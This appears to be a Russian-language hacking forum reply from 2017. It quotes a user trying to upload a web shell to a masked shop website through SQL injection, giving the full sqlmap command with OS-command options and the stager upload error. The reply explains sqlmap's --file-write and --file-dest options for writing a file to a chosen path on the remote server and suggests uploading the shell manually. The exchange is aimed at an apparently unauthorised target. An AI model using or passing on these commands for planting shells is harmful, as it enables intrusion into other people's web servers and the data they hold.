
08.09.2017, 14:34
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от MrBa
↑
Пытаюсь залить шелл. ls-dbs:true
Вот запрос - sqlmap -u "
http://xxxxxx.com/product/shopview.php?shop=51479
" --dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1
путь есть, указываю -
please provide a comma separate list of absolute directory paths: /home/xxxx/public_html/images/main
но он обращается сюда и подставляет из запроса product/shopview.php/ -
[WARNING] unable to upload the file stager on '/home/xxxx/public_html/images/main/product/shopview.php/'
как избавиться от этого? Ведь указываю путь куда именно залить файл
Код:
--file-write=WFILE Write a local file on the back-end DBMS file system --- локальный путь до файла
--file-dest=DFILE Back-end DBMS absolute filepath to write to --- куда лить на удаленном хосте
а вообще чего руками то не залить
|
|
|